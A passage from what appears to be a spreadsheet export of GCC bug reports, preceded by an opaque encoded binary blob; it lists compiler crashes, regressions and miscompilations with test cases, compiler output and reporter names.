M%0(.$(2%00TA(0A&amp;0J(L$`A%6(AX!KL%GRY\(L#%
MC!H8@&amp;-C&amp;QC0QH8@H&amp;9!C$$$-C&amp;
MQC8QL8VT2$&amp;5BHP@C80A!(0&gt;&amp;4E*JJI*56&lt;LLLUE4TSEDQ4
M855)2F%)I6&lt;LL88929RRQAA#*E&amp;:FBCC2F-%*T5@TK2C&amp;&amp;6IE3(B52$
M(D
M(#9'@AI-DB03R(YPGDQ%C&amp;-D&amp;QC8S`(B((:&amp;(:&amp;(
M:H&gt;3&gt;$\&amp;$THV/[.'F19\U_88
M890_K)4?U/S-C%#*+`H^1$%GQE%GO%O81&lt;2@R$(93$'&lt;W#:6%=!2A`#=
M/34N+]ND1?IF6WLF?$['-LSTFA^6M$^%I)/DNW9X-#RO*82F&amp;#L*86.B2P
M&amp;(Y5^&lt;\]-]JF&amp;5%4PY/S&lt;5A&lt;3%JL*I4K[\4ZJVAG_%8WSO5RQ=JTR86*1
M*G$F56E(L#$(LA@A`0C!#+*)/443IWN&amp;?WY6E&amp;FS!U&lt;?Y3!6%MN#*2/03
MV_V=6IM(Z&gt;=44.CR3S1C&amp;&amp;H#V0--#IC&amp;
MZ0AC3DJ0D5))$/3GL^*M7P^Z/9(RHTK*IX.TF')5?#$86%P*Y.FJN$E$
M.845L::E(@\@A=#&gt;S.3PDFTD-:8/8J$]S9&amp;(CO[2L$E8*#E]VP(20@0X2R
MZ=)IWLLG$4\.&amp;S&gt;.YW-T2I51XM28&lt;HJ&amp;53URE
M&gt;C25:I]NIW&amp;[R9RRQA&gt;'$I5513&lt;5A[)W&amp;H]EDJTLIZ8
M]7FXYO#B!)Z(L1V?'&amp;`&lt;YR1W^#R&lt;HWB3V24[HX.?0596&amp;H\I'3
MH\VD1QY))X&gt;JY]'+396GJ90MYBF(`!$BJF$4$`9WTMS'9
M&amp;7/B0_B^YZ&amp;&amp;=OK:.70Z.][X(-]N4^*\^O\^?.])WN
M3#+96BJCO.0Y-*1LK3F#23333+!6DF%&amp;#38
MZ#9NPXN3#DIED0@9UVTK:REV\7(
M\3R/5SW8MFOXZDF&lt;KCS&amp;V.O/
M&gt;:VP28O&gt;Y(/B3FVF[\.U.KQPE/()H6ABPN&amp;_$U9&amp;Z\)OKJ=G5O&gt;$?!&gt;ME
M-3PQ:WVV0MLI=DD/95P(.`1R0.C1N&amp;QYLG1S&gt;+DZ-.&amp;[Q=S+D5U4RV*&lt;.
MCN9.3=NW=%*[F6%:='-N\%J*WNSL:M*JN'FY.3D&lt;.QEXO)E67@X=&amp;[S
M&gt;A'=*1T2E*CPM*JHU$DJ))CWS238?/J2JMJBJ(\'I&gt;O85YOG8::&gt;#)@=6#
MW_$^)X1WQX1WR3V3I(JC$A\)SYN1VW^+NP:1UE*IS#QBP?+E:GC7[&lt;_J*8S
M+&gt;!C'G#%V:\B#&amp;.$)1QPS%B(1MK=6CQL!X\3M0&gt;DPZQVY06('3=#WQSCZP
M3J$/1+%MV6BN9INW&lt;/J?NNCH_RKIS/I5V4W5IU9=DAGS/2\&amp;
M!SJ?PGJJMF3ULX84]:D'CGP$WFRY
M/4J9E.:OHA^=4?AHLL=)N[$3$.N(D%!M()+`1^U]J'=NT
M0B\?_VT40**BB@H[E\Y]T\&lt;R'V#I^?9*J258^T?
MVOP/&amp;4\Z956#!ZWNC*.SVL/&gt;G\U&amp;)'BJKT'9TB(_0.A4TA)6%62)8J*BI5D_
M$VD[BI2R3P3D/)Q(N6$DFB-!]$^']]X_---/YG?.CVPI(D=E5*JCVD^*)Z
MXRTT+-&amp;4/@'#$Z]L.S.
M?P0Z/!R1.L2MC6)!X3FD4U)9'P^_CUY8:85A1'M::+H7.=@COFF2(1-@
ML$6''.MSWT_FGY9_6&gt;4)\Z_A^K[OL^HR3[%*RKBW3=]C\#O?A8=7./Q.?
M#3#3H88:NC=R&lt;G5T=NJ(&lt;JM.YT&lt;-B&lt;*H4548)
M)/\R^\^X^_/6]F)(F[S5.Z104D\5=%&amp;T22H[G)F.]H^.1^%9/E4CG#J&lt;&amp;ZO
M65A\U8^J':G/2P`:=A6$HBT%-8F)#MTOV&lt;(5993Z66_?5A51]&lt;[`?=)CZ
MX-V73[.6(GDWK['O8MA*P819*=9J1'[PL&lt;`538:Q$!$[D.J==LGQCO\]
M?G^!NNC[SFP
MTX=7&gt;X9:YF6F3AW-W-TBL)I9R&lt;V&amp;ZF[$F'1Z7I?IO0^8/A*I
M^AZ7L?.YI$PS1SE]V
M*GPM&gt;]D&gt;3P'EM\WTOJK33RC\S[([GE'N2?@D-X[RSJKJKK'U$^_(KXJ+^RG
MG!\)Q)\[R/A1)^*8P[C/O._W*FC3G[GH8*K2R5S=6'H?B^%*&gt;NWO7D(-[Q3
M/J:8W$20I55*2/2J'I5A!I'$D9+'`L:?F=7K(O0V?2W89B/5Q$3$2D12?
M&amp;:.$=E8?Y.&amp;HW&gt;]Z9$@&gt;#CX!Z8B:B1$)$]5MO+$]M1]JOEX&gt;EWS2.H/R'F
MS(]YO?[*T1LR.(\V.3V'[K[FZ3H]C&gt;/'P&gt;Y[M3UF
MK)\]8PD?FG#P2F\%'(SN#C[XV
M5=9$YL+9IS3]SEM=4Q%[68MMY?S?)$?*/P'T/IR^UH^\JLLOLZ\:0FG##9
MCT\GWGY[#ZU.S!]K+MF7Q=3+AU#FX6[.BL.3FZMU7KN_2?
MGOD&gt;M'BD\E1@/D*P3R&lt;G')9F7DW-NV3)LW(SQADF8%5FY94PM599+7DP8/R
M/(]TCV&amp;D)&amp;DD2#R::JCN]/Z339NK=IA*JI--.3WJJJJHDJIGKYJFJK=EEE
MZCU*5H]2GK4&gt;I*V5SAY*?&lt;
MDQ)C2)8I)SNU:M4MKG&lt;31)YMZ5\M\#GNGPCD]L#0`#H]75BHU%.5M4X@=
ML:(NU1&lt;^2O0TD^%`+9GL\^6+9-:!$A&amp;D'&lt;$R6:XHH'1?6&amp;TQXAPGU
M'(\#INGL4ZN21ZE/4W:]M6555:Z(7T!(*!S3U09D.GX$V:+F%)V.7F:@K&lt;E
MA^&amp;?U(&gt;*/6=]M2)V38=EC)Y0Z\GLQO$J&gt;+S.&amp;CJY55%_9_HN?#Q?C3^(RU
MKAXK[Q#R#E/G%\*N9APU&gt;V?0PM8K]67K#U^!R*IS56]=VVEFS(T:)B
M$R9-HC20ADLVS36S:&lt;NMMO:/K_3\CAI^!A
M^&lt;^U^%S^UW-]+ER(K9R:.YU&lt;G-Z7O=7@BJHV8&lt;'*VR:N
MINFFFGE4_I/J?EI^VT&gt;\^%54?O7N?M/E33#+*'I?`R^I7#O1G(Z$R^1^J
M?9$7'#ILYNK*LJY6S9@]TG26G0E?).CIE55-V
M6Q!.U(6P$S*)&amp;9I\1AAZL3W/Q*]T23P
M5(^11J^*&lt;QA'8[G#D\'&lt;P\WB\6Q</t>
  </si>
  <si>
    <t>stephane.donze</t>
  </si>
  <si>
    <t>GCC-28207</t>
  </si>
  <si>
    <t>128-bit IBM long double misaligned on stack</t>
  </si>
  <si>
    <t>long doubles are only aligned to word boundaries when passed via the stack (ie. to a function that uses more than 8 fp regs for other parameters).  The va_arg support expects long doubles to be double word aligned resulting in a mismatch between caller and callee for variable argument functions.</t>
  </si>
  <si>
    <t>GCC-63423</t>
  </si>
  <si>
    <t>internal compiler error: in cp_parser_abort_tentative_parse at cp/parser.c</t>
  </si>
  <si>
    <t>Testcase:
template &lt;typename F typename A
          typename = decltype(static_cast(F::operator())(A()))&gt;
void test()
Compile it with '-std=c++11'. Tested to fail with GCC 4.8.[0123]. GCC 4.9.x does not fail.
Output from GCC 4.8.3:
ice.cpp:2:76: internal compiler error: in cp_parser_abort_tentative_parse at cp/parser.c:23778
           typename = decltype(static_cast(F::operator())(A()))&gt;
                                                                            ^
0x584872 cp_parser_abort_tentative_parse
        ../.././gcc/cp/parser.c:23777
0x5937ec cp_parser_decltype
        ../.././gcc/cp/parser.c:11425
0x592172 cp_parser_simple_type_specifier
        ../.././gcc/cp/parser.c:13885
0x58e83d cp_parser_type_specifier
        ../.././gcc/cp/parser.c:13756
0x590f17 cp_parser_type_specifier_seq
        ../.././gcc/cp/parser.c:17296
0x59638a cp_parser_type_id_1
        ../.././gcc/cp/parser.c:17177
0x5a0e5a cp_parser_type_id
        ../.././gcc/cp/parser.c:17214
0x5a0e5a cp_parser_type_parameter
        ../.././gcc/cp/parser.c:12512
0x5a1019 cp_parser_template_parameter
        ../.././gcc/cp/parser.c:12345
0x5a1019 cp_parser_template_parameter_list
        ../.././gcc/cp/parser.c:12262
0x5a67d9 cp_parser_template_declaration_after_export
        ../.././gcc/cp/parser.c:21914
0x5aafa9 cp_parser_declaration
        ../.././gcc/cp/parser.c:10412
0x5a9bfd cp_parser_declaration_seq_opt
        ../.././gcc/cp/parser.c:10334
0x5ab402 cp_parser_translation_unit
        ../.././gcc/cp/parser.c:3813
0x5ab402 c_parse_file()
        ../.././gcc/cp/parser.c:28334
0x641b84 c_common_parse_file()
        ../.././gcc/c-family/c-opts.c:1052</t>
  </si>
  <si>
    <t>kretz</t>
  </si>
  <si>
    <t>GCC-9570</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Assember error with -finline-functions with g++-3.3</t>
  </si>
  <si>
    <t>Hi
compiling the attached code with
g++ -c -fno-rtti  -fno-exceptions -march=i586  -fno-defer-pop -freg-struct-return -g -Wall -W -finline-limit=2000 -finline-functions -O2 profile.ii -o profile.o -save-temps
gives the following assembler error:
profile.s: Assembler messages:
profile.s:501: Error: attempt to .org backwards
When removing -finline-functions (or using -O2 instead of -O3) it compiles fine.
It also works with g++-3.2.
The GNU as version is
GNU assembler version 2.13.90.0.16 (i386-linux) using BFD version 2.13.90.0.16 20021126 Debian GNU/Linux
I don't know if this behaviour could also be related to as.
Release:
gcc version 3.3 20030203 (prerelease)
Environment:
Debian Woody/3.0_r1 x86 Linux 2.4.20 SMP</t>
  </si>
  <si>
    <t>GCC-71302</t>
  </si>
  <si>
    <t>[9 Regression] -Wzero-as-null-pointer-constant: misleading caret location for pointer in function call</t>
  </si>
  <si>
    <t>Created attachment 38579
Simple test case
-Wzero-as-null-pointer-constant incorrectly points to closing bracket instead of actual argument which should take nullptr.
Same problem exists in 4.9 and 5.</t>
  </si>
  <si>
    <t>eugene.zelenko</t>
  </si>
  <si>
    <t>GCC-20923</t>
  </si>
  <si>
    <t>gfortran slow for large array constructors</t>
  </si>
  <si>
    <t>While I was looking for an ICE I noticed that the following code causes gfortran to take a long time 
(almost a minute this is without optimizations)
program sel
    implicit none
    integerparameter              :: n=1000
    integer                        :: ij
    realdimension(n*n) :: vect
    vect(:) = (/ ((( (i+j+3))i=1n)j=1n) /)
end</t>
  </si>
  <si>
    <t>GCC-64647</t>
  </si>
  <si>
    <t>[5 Regression] [C++14] std::__max_element contains code not allowed in constexpr function</t>
  </si>
  <si>
    <t>#include 
#include 
int main()
{
  std::forward_list v
  std::max_element(v.begin() v.end())
}
Compiling with -std=c++14 gives:
In file included from /home/jwakely/gcc/5/include/c++/5.0.0/algorithm:62:0
                 from max.cc:2:
/home/jwakely/gcc/5/include/c++/5.0.0/bits/stl_algo.h: In instantiation of â€˜constexpr _ForwardIterator std::__max_element(_ForwardIterator _ForwardIterator _Compare) [with _ForwardIterator = std::_Fwd_list_iterator _Compare = __gnu_cxx::__ops::_Iter_less_iter]â€™:
/home/jwakely/gcc/5/include/c++/5.0.0/bits/stl_algo.h:5514:43:   required from â€˜constexpr _FIter std::max_element(_FIter _FIter) [with _FIter = std::_Fwd_list_iterator]â€™
max.cc:7:38:   required from here
/home/jwakely/gcc/5/include/c++/5.0.0/bits/stl_algo.h:5489:35: error: variable â€˜__resultâ€™ of non-literal type â€˜std::_Fwd_list_iteratorâ€™ in â€˜constexprâ€™ function
       _ForwardIterator __result = __first
                                   ^
In file included from /home/jwakely/gcc/5/include/c++/5.0.0/forward_list:38:0
                 from max.cc:1:
/home/jwakely/gcc/5/include/c++/5.0.0/bits/forward_list.h:120:12: note: â€˜std::_Fwd_list_iteratorâ€™ is not literal because:
     struct _Fwd_list_iterator
            ^
/home/jwakely/gcc/5/include/c++/5.0.0/bits/forward_list.h:120:12: note:   â€˜std::_Fwd_list_iteratorâ€™ is not an aggregate does not have a trivial default constructor and has no constexpr constructor that is not a copy or move constructor</t>
  </si>
  <si>
    <t>GCC-37379</t>
  </si>
  <si>
    <t>[graphite] ICE compiling aermod.f90 with -ffast-math -floop-block -O2 -fgraphite</t>
  </si>
  <si>
    <t>When compiling the aermod.f90 from the Polyhedron 2005 benchmarks with gfortran using either...
gfortran -ffast-math -floop-block -O2 -fgraphite aermod.f90
or
gfortran -ffast-math -O2 -floop-strip-mine -fgraphite aermod.f90
results in the compiler error...
aermod.f90: In function â€˜vrtcblâ€™:
aermod.f90:14521: internal compiler error: in instantiate_scev_1 at tree-scalar-evolution.c:2220
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This error doesn't occur when the -ffast-math flag is not used.</t>
  </si>
  <si>
    <t>GCC-18091</t>
  </si>
  <si>
    <t>Valgrind errors building libjava</t>
  </si>
  <si>
    <t>I saw several kinds of errors in huge quantity.
/home/drow/valgrind/gcc/gcj -B/home/drow/valgrind/gcc/
-B/usr/local/i686-pc-linux-gnu/bin/ -B/usr/local/
i686-pc-linux-gnu/lib/ -isystem /usr/local/i686-pc-linux-gnu/include -isystem
/usr/local/i686-pc-linux-g
nu/sys-include --encoding=UTF-8 -Wno-deprecated -C -g -classpath ''
-bootclasspath /home/drow/valgrind/i
686-pc-linux-gnu/libjava:/home/drow/src/gcc/libjava -d
/home/drow/valgrind/i686-pc-linux-gnu/libjava /ho
me/drow/src/gcc/libjava/java/lang/Class.java
==21511== Source and destination overlap in memcpy(0x1BE08FEC 0x1BE08FEC 5)
==21511==    at 0x1B904BCE: memcpy (mac_replace_strmem.c:113)
==21511==    by 0x80D37F2: write_classfile (jcf-write.c:2800)
/home/drow/valgrind/gcc/gcj -B/home/drow/valgrind/gcc/
-B/usr/local/i686-pc-linux-gnu/bin/ -B/usr/local/
i686-pc-linux-gnu/lib/ -isystem /usr/local/i686-pc-linux-gnu/include -isystem
/usr/local/i686-pc-linux-g
nu/sys-include --encoding=UTF-8 -Wno-deprecated -C -g -classpath ''
-bootclasspath /home/drow/valgrind/i
686-pc-linux-gnu/libjava:/home/drow/src/gcc/libjava -d
/home/drow/valgrind/i686-pc-linux-gnu/libjava /ho
me/drow/src/gcc/libjava/java/lang/Integer.java
==21620== Conditional jump or move depends on uninitialised value(s)
==21620==    at 0x80C4165: get_attribute (jcf-parse.c:160)
==21620== 
==21620== Conditional jump or move depends on uninitialised value(s)
==21620==    at 0x1B90478B: strlen (mac_replace_strmem.c:189)
==21620==    by 0x85E6B68: get_identifier (stringpool.c:111)
==21620== 
==21620== Conditional jump or move depends on uninitialised value(s)
==21620==    at 0x1B904795: strlen (mac_replace_strmem.c:189)
==21620==    by 0x85E6B68: get_identifier (stringpool.c:111)
==21620== 
==21620== Invalid read of size 1
==21620==    at 0x1B904791: strlen (mac_replace_strmem.c:189)
==21620==    by 0x85E6B68: get_identifier (stringpool.c:111)
==21620==  Address 0x1BD5595A is 0 bytes after a block of size 26 alloc'd
==21620==    at 0x1B904EDD: malloc (vg_replace_malloc.c:131)
==21620==    by 0x8779F1C: xmalloc (xmalloc.c:143)
==21620==    by 0x80C4157: get_attribute (jcf-parse.c:156)</t>
  </si>
  <si>
    <t>GCC-37385</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in set_mem_alias_set with the vectorizer and function pointers</t>
  </si>
  <si>
    <t>With current trunk (r140029):
(sid)985:tbm@em64t: ..4.3-2008-09-05-r140029/gcc] ./cc1 -quiet -O3 ~/libsdl-erlang-esdl_wrapper.i
esdl_wrapper.c: In function 'init_fps':
esdl_wrapper.c:77: internal compiler error: in set_mem_alias_set at emit-rtl.c:1789
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-17670</t>
  </si>
  <si>
    <t>[4.0 regression] new (type-id) parsed as array-new</t>
  </si>
  <si>
    <t>The expression new (type-id) is always parsed as array new operator even if  
type-id is not an array type.  
$ cat new.cc  
struct X {}  
X *new_X () { return new (X) }  
$ gcc -S new.cc  
$ c++filt &lt; new.s | grep operator  
	br.call.sptk.many b0 = operator new[](unsigned long)#  
This is caused by this change:  
2004-06-21  Mark Mitchell    
	* cp-tree.def (NEW_EXPR): Add a fourth slot.  
	...</t>
  </si>
  <si>
    <t>GCC-67916</t>
  </si>
  <si>
    <t>[6 Regression] wrong code at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux-gnu at -O3 in both 32-bit and 64-bit modes. 
This is a regression from 5.2.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151009 (experimental) [trunk revision 228653] (GCC) 
$ 
$ gcc-trunk -O2 small.c ./a.out
$ gcc-5.2 -O3 small.c ./a.out
$ 
$ gcc-trunk -O3 small.c
$ ./a.out
Aborted (core dumped)
$ 
--------------------------------------------
int a[6] b = 1 d e
long long c
static int f = 1
void
fn1 (int p1)
{
  b = (b &gt;&gt; 1) 
}
void
fn2 ()
{
  b = (b &gt;&gt; 1) 
  fn1 (c &gt;&gt; 1 
  fn1 (c &gt;&gt; 2 
  fn1 (c &gt;&gt; 4 
  fn1 (c &gt;&gt; 8 
}
int
main ()
{
  int i j
  for ( d)
    {
      for ( e)
	fn2 ()
      f = 0
    }
  for (i = 0 i &lt; 8 i++)
    {
      if (f)
	i = 9
      for (j = 0 j &lt; 7 j++)
	fn2 ()
    }
  if (b != 0)
    __builtin_abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-69795</t>
  </si>
  <si>
    <t>[6 Regression] g++ ICE on invalid code on x86_64-linux-gnu in reject_gcc_builtin</t>
  </si>
  <si>
    <t>The following invalid code causes an ICE when compiled with the current g++ trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/home/absozero/trunk/root-gcc/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/absozero/trunk/root-gcc --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20160212 (experimental) [trunk revision 233377] (GCC) 
$ g++-trunk abc.cc
abc.cc:1:27: error: expected end of capture-list
 int freopen ( freopen += *[
                           ^
abc.cc: In lambda function:
abc.cc:1:27: error: expected â€˜{â€™ at end of input
abc.cc: At global scope:
abc.cc:1:27: internal compiler error: tree check: expected function_decl have var_decl in reject_gcc_builtin at c-family/c-common.c:12620
0xfb074c tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc/gcc/tree.c:9637
0x89cf16 tree_check(tree_node const* char const* int char const* tree_code)
	../../gcc/gcc/tree.h:3262
0x89cf16 reject_gcc_builtin(tree_node const* unsigned int)
	../../gcc/gcc/c-family/c-common.c:12620
0x668f1c mark_rvalue_use(tree_node* unsigned int bool)
	../../gcc/gcc/cp/expr.c:99
0x7eaa74 rvalue(tree_node*)
	../../gcc/gcc/cp/tree.c:716
0x7eadad stabilize_expr(tree_node* tree_node**)
	../../gcc/gcc/cp/tree.c:4209
0x7805bf cp_build_modify_expr(tree_node* tree_code tree_node* int)
	../../gcc/gcc/cp/typeck.c:7704
0x62f275 build_new_op_1
	../../gcc/gcc/cp/call.c:5740
0x62fa4e build_new_op(unsigned int tree_code int tree_node* tree_node* tree_node* tree_node** int)
	../../gcc/gcc/cp/call.c:5824
0x781ceb build_x_modify_expr(unsigned int tree_node* tree_code tree_node* int)
	../../gcc/gcc/cp/typeck.c:7899
0x7416f6 cp_parser_assignment_expression
	../../gcc/gcc/cp/parser.c:9095
0x741877 cp_parser_constant_expression
	../../gcc/gcc/cp/parser.c:9324
0x742e2a cp_parser_parenthesized_expression_list
	../../gcc/gcc/cp/parser.c:7454
0x7438d6 cp_parser_initializer
	../../gcc/gcc/cp/parser.c:20730
0x7552dd cp_parser_init_declarator
	../../gcc/gcc/cp/parser.c:18594
0x755beb cp_parser_simple_declaration
	../../gcc/gcc/cp/parser.c:12359
0x755f7a cp_parser_block_declaration
	../../gcc/gcc/cp/parser.c:12235
0x75ecde cp_parser_declaration
	../../gcc/gcc/cp/parser.c:12132
0x75d646 cp_parser_declaration_seq_opt
	../../gcc/gcc/cp/parser.c:12011
0x75d958 cp_parser_translation_unit
	../../gcc/gcc/cp/parser.c:4321
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ cat abc.cc
int freopen ( freopen += *[</t>
  </si>
  <si>
    <t>GCC-3045</t>
  </si>
  <si>
    <t>global stream objects destructor semantics</t>
  </si>
  <si>
    <t>In libstdc++-v3/src/ios.cc function ios_base::Init::_S_ios_destroy are these lines:
	delete cout.rdbuf()
	delete cin.rdbuf()
	delete cerr.rdbuf()
These are no doubt the counterpart to the following lines from ios_base::Init::_S_ios_create:
	new (
	new (
	new (
However the use of the rdbuf() method is incorrect. (See previous bug report dealing with rdbuf()).  This use of rdbuf() could lead to badness if cout/cin/cerr/clog were to be redirected.
Release:
cvs 20010603
Environment:
source
How-To-Repeat:
#include 
#include 
std::basic_filebuf b1
int main()
{
  b1.open(foo)
  cout.rdbuf( b1 )
  std::cout &lt;&lt; hello &lt;&lt; std::endl
  return 0
}
// at program termination b1 is deleted by 
// ios_base::Init::_S_ios_destroy
// and the streambuf created to handle output
// to stdout is leaked.</t>
  </si>
  <si>
    <t>GCC-45640</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/20050316-2.c ICEs with -mno-mmx -m3dnow -flto</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -mno-mmx -m3dnow -flto gcc.c-torture/execute/20050316-2.c
In file included from gcc.c-torture/execute/20050316-2.c:34:0
                 from :0:
gcc.c-torture/execute/20050316-2.c: In function 'main':
gcc.c-torture/execute/20050316-2.c:45:15: internal compiler error: in copy_to_mode_reg at explow.c:636
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: /mnt/svn/gcc-trunk/binary-164162-lto-fortran-checking-yes-rtl-df/bin/gcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status
$ gcc -mno-mmx -m3dnow -flto gcc.c-torture/execute/20050316-2.c -O
In file included from gcc.c-torture/execute/20050316-2.c:34:0                                                               
                 from :0:                                                                                                    
gcc.c-torture/execute/20050316-2.c: In function 'test3':                                                                     
gcc.c-torture/execute/20050316-2.c:24:3: internal compiler error: in expand_expr_real_1 at expr.c:8484                      
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: /mnt/svn/gcc-trunk/binary-164162-lto-fortran-checking-yes-rtl-df/bin/gcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status
$ gcc -mno-mmx -m3dnow -flto gcc.c-torture/execute/20050316-2.c -m32
In file included from :0:0:
gcc.c-torture/execute/20050316-2.c: In function 'test1':
gcc.c-torture/execute/20050316-2.c:10:1: warning: MMX vector argument without MMX enabled changes the ABI [enabled by default]
In file included from gcc.c-torture/execute/20050316-2.c:34:0
                 from :0:
gcc.c-torture/execute/20050316-2.c: In function 'main':
gcc.c-torture/execute/20050316-2.c:45:15: internal compiler error: in emit_move_insn at expr.c:3386
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: /mnt/svn/gcc-trunk/binary-164162-lto-fortran-checking-yes-rtl-df/bin/gcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status
Tested revisions:
r164162 - crash
r153685 - crash</t>
  </si>
  <si>
    <t>GCC-36872</t>
  </si>
  <si>
    <t>__has_nothrow_copy(T) false for T with a throwing vararg ctor</t>
  </si>
  <si>
    <t>Similarly to (but not exactly the same as) the template ctor in bug 36871
gcc 4.3.0 trips up on class with a throwing vararg ctor (regardless of the
number of arguments):
$ cat u.cpp &amp;&amp; g++ u.cpp -std=c++0x &amp;&amp; ./a.out 
#include 
#include 
struct S {
    S (const S
    S (...) throw (int)
}
int main ()
{
    assert (std::has_nothrow_copy_constructor::value)
    assert (__has_nothrow_copy (S))
}
a.out: u.cpp:12: int main(): Assertion `std::has_nothrow_copy_constructor::value' failed.
Aborted</t>
  </si>
  <si>
    <t>GCC-21775</t>
  </si>
  <si>
    <t>NPE in java::util::logging::Logger::getCallerStackFrame caused by incorrect hand-optimization</t>
  </si>
  <si>
    <t>Marking this as critical because it is a NPE in logging which can cause apps to
fail to start at all (e.g. rssowl fails to start if it hasn't been configured)
or fail to log important information.
The attached test case when compiled with
gcj -g -o mylogger --main=Test Test.java
and run fails with:
Exception in thread main java.lang.NullPointerException
   at java.lang.Class.getName() (/usr/lib/libgcj.so.6.0.0)
   at java.util.logging.Logger.getCallerStackFrame() (/usr/lib/libgcj.so.6.0.0)
   at java.util.logging.Logger.log(java.util.logging.Level java.lang.String
java.lang.Throwable) (/usr/lib/libgcj.so.6.0.0)
   at Test.main(java.lang.String[]) (/root/bugs/gcj/logging/Test.java:9)
   at gnu.java.lang.MainThread.call_main() (/usr/lib/libgcj.so.6.0.0)
   at gnu.java.lang.MainThread.run() (/usr/lib/libgcj.so.6.0.0)
(The stack trace itself is arguably wrong in Java terms - the NPE _actually_
occurs in Logger.getCallerStackFrame and is only detected when
java.lang.Class.getName tries to do its thing - but that's another bug. I'll
file that separately.)
The cause is here:
java::lang::StackTraceElement* 
java::util::logging::Logger::getCallerStackFrame ()
{
  gnu::gcj::runtime::StackTrace *t 
    = new gnu::gcj::runtime::StackTrace(4)
  java::lang::Class *klass = NULL
  int i = 2
  try
    {
      // skip until this class
      while ((klass = t-&gt;classAt (i)) != getClass())
	i++
      // skip the stackentries of this class
      while ((klass = t-&gt;classAt (i)) == getClass() || klass == NULL)
	i++
    }
  catch (::java::lang::ArrayIndexOutOfBoundsException *e)
    {
      // FIXME: RuntimeError
    }
klass is null at the end of this code block. But you can see that the second
loop keeps looping if klass==null. So how can klass be null? The answer is an
ArrayIndexOutOfBoundsException _must_ have been thrown.
Next question: Why was it thrown? Answer: Because the first loop started at i=2
- but the last Logger stack entry is at position i=1. So it missed the last
Logger stack entry so the loop never terminated normally.
Suggested fix: the initial value of i should be smaller than 2.</t>
  </si>
  <si>
    <t>GCC-35105</t>
  </si>
  <si>
    <t>GNAT bug</t>
  </si>
  <si>
    <t>gnatmake -Pxxx/taskman.gpr taskman.adb -d 
gcc-4.1 -c -g -g -gnat05 -gnatwc -gnatwd -gnatwi -gnatwj -gnatwp -gnatwr -gnatVc -gnatVi -gnatVm -gnatVr -I- -gnatA xxx/tasks.adb
+===========================GNAT BUG DETECTED==============================+
| 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu3) (i486-pc-linux-gnu) |
| Assert_Failure sinfo.adb:649                                             |
| Error detected at tasks.adb:213:30                                       |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc-4.1 or gnatmake command that you entered.          |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases 
so please double check that the problem can still 
be reproduced with the set of files listed.
/home/tomek/scr/03taskman/tasks.adb
/home/tomek/scr/03taskman/tasks.ads
/home/tomek/scr/03taskman/ansi_term.ads
process exited with status 4</t>
  </si>
  <si>
    <t>nowak2000</t>
  </si>
  <si>
    <t>GCC-51305</t>
  </si>
  <si>
    <t>[C++11][constexpr] noexcept-specifier overconstraints constexpr functions</t>
  </si>
  <si>
    <t>gcc 4.7.0 20111119 (experimental) in C++11 mode with -Wall rejects the
following code:
//-------
constexpr bool ok() noexcept
{
  typedef int type
  return true
}
constexpr auto x = ok()
//-------
the error being:
main.cpp||In function 'constexpr bool ok()':|
main.cpp|5|error: body of constexpr function 'constexpr bool ok()' not a return-statement|
main.cpp|7|error: 'constexpr bool ok()' called in a constant expression
The stringency becomes activated with the addition of the noexcept-specifier to the constexpr function.
Here is a more advanced test set that should be accepted after the fix of this issue:
//-------
namespace n { void foo() }
constexpr bool ok() noexcept
{
  typedef bool some
  using other = int
  using namespace n
  using n::foo
  static_assert(!false )
  return true
}
constexpr auto x = ok()
template
struct C{}
C c
//-------</t>
  </si>
  <si>
    <t>GCC-4754</t>
  </si>
  <si>
    <t>problem with nested extern C</t>
  </si>
  <si>
    <t>compiling the attached example gives an error:
&gt; c++ extern.cc
extern.cc:5: storage class specified for field `i'
Exit 1
Release:
3.0.2
Environment:
System: Linux wave 2.4.13 #1 SMP Thu Oct 25 14:26:17 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: configure --enable-shared --enable-threads --enable-languages=c++
How-To-Repeat:
c++ extern.cc</t>
  </si>
  <si>
    <t>GCC-78766</t>
  </si>
  <si>
    <t>GCC Awk scripts use the non-POSIX  /^{/ regex</t>
  </si>
  <si>
    <t>When building with the latest Gawk 4.14 and POSIXLY_CORRECT set I get the error
